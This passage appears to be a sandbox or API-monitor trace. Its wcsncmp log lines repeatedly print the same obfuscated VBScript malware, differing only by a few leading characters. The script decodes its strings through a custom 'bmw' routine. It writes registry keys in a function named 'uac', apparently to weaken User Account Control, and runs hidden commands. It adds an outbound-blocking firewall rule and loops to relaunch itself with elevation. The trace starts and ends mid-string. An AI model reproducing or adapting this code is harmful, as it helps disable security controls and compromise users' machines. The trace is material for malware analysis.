bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.013] wcsncmp (_String1="le = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.013] wcsncmp (_String1="e = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.013] wcsncmp (_String1=" = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.013] wcsncmp (_String1="= CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0223.014] wcsncmp (_String1=" CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 